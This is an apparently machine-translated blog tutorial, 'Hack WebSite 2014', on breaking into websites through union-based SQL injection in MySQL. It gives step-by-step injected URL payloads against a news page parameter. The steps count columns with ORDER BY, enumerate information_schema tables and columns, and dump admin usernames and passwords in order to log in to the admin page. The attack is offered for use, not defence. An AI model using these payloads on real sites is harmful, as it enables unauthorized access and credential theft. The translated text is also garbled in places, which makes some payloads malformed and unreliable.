Hack WebSite 2014

 HACK WEBSITE 2014

still with my desert lion, a little understanding about SQL Injection, SQL Injection is the hacking is done by modifying the client applied existing SQL commands dimemori client applications and a technique to exploit a web application that includes a database for data storage use.I need to know before doing SQL Injection in MySQL:character: 'or -comments: / * or -information_schema for version: MySQL version 5.x, no support for MySQL version 4.x[Step 1]Look for a targetFor example: site :/ berita.php? Id = 1Add character 'at the end of the url or add character "-" to see if there is an error message.example::/ berita.php site? id = 1 'or:/ berita.php site? id = -1[Step 2]Finding and counting the number of tables that exist in the database ...use the command: order byExample::/ berita.php site? id = -1 + order + by +1- - or:/ berita.php site? id = -1 + order + by +1 / *detail in a step by step (satupersatu) ...For example::/ berita.php site? id = -1 + order + by +1- -:/ berita.php site? id = -1 + order + by +2- -:/ berita.php site? id = -1 + order + by +3- -:/ berita.php site? id = -1 + order + by +4- -So that there is an error or missing error message ...For example: site: berita.php? Id = -1 + order + by +9- -Means that we take is to figure 8Being :/ berita.php site? Id = -1 + order + by +8- -[Step 3]how to remove the numbers that appear use the unionbecause it was error to figure 9then: site :/ berita.php? id = -1 + union + select +1,2,3,4,5,6,7,8 -ok is like that out number 5use the version () or @ @ version to check which version of sql command input diapakai TSB on nagka who came out earliereg: site :/ berita.php? id = -1 + union + select +1,2,3,4, version () ,6,7,8 - or:/ berita.php site? id = -1 + union + select +1,2,3,4, @ @ version ,6,7,8 -See the version used se'umpama version 4 left alone because in version 4 we have to guess at his own table and column that exist on the web because they can not use command + From INFORMATION_SCHEMA ..For version 5 you are lucky, no need to guess table and column as version 4 as in version 5 can use command + From INFORMATION_SCHEMA ..[Step 4]To display the table that is on the web istable_name command >>> included in figures out last yanggcommand + from + information_schema.tables / * >>> inserted after the last digitCode::/ berita.php site? id = -1 + union + select +1,2,3,4, table_name, 6,7,8 + from + information_schema.tables--Se'umpama table that appears is "admin"[Step 5]to display all the contents of the table iscommand group_concat (table_name) >>> included in the figures that came out earliercommand + from + information_schema.tables + where + table_schema = database () >>> inserted after the last digit:/ berita.php site? id = -1 + union + select +1,2,3,4, group_concat (table_name), 6,7,8 + from + information_schema. tables + where + table_schema = database () -[Step 6]Command group_concat (column_name) >>> included in the figures that came out earlierinformation_schema.columns + orders + from + where + table_name = 0xhexa - >>> inserted after the last digit:/ berita.php site? id = -1 + union + select +1,2,3,4, group_concat (column_name), 6,7,8 + from + information_schema. columns + where + table_name = 0xhexa -At this stage you shall mengextrak word on the contents of a table that is by converting hexadecimalWebsites which are used for the conversion:http://www.v3n0m.net/ascii.htmExamples of words you want to convert the admin then it will be 61646D696E:/ berita.php site? id = -1 + union + select +1,2,3,4, group_concat (column_name), 6,7,8 + from + information_schema. columns + where + table_name = 0x61646D696E -[Step 7]Bring up what had been excluded from the table that is the wayconcat_ws command (0x3a, column contents result that would be issued) >>> included in the figures that came out earliercommand + from + (derived table name) >>> inserted after the last digitExample::/ berita.php site? id = -1 + union + select +1,2,3,4, concat_ws (0x3a, result column contents), 6,7,8 + from + (name derived table) -Example is the word that comes out id, username, passwordExample: site :/ berita.php? Id = -1 + union + select +1,2,3,4, concat_ws (0x3a, id, username, password), 6,7,8 + from + admin -[Step 8]The last stage for admin or login page.Just How much for Hacking Website With SQL Injection TechniquesHopefully Helpful Description: How Hacking Website With SQL Injection Techniques, Rating: 4.5, Reviewers: Bang Zendy, ItemReviewed: How Hacking Website With SQL Injection Techniques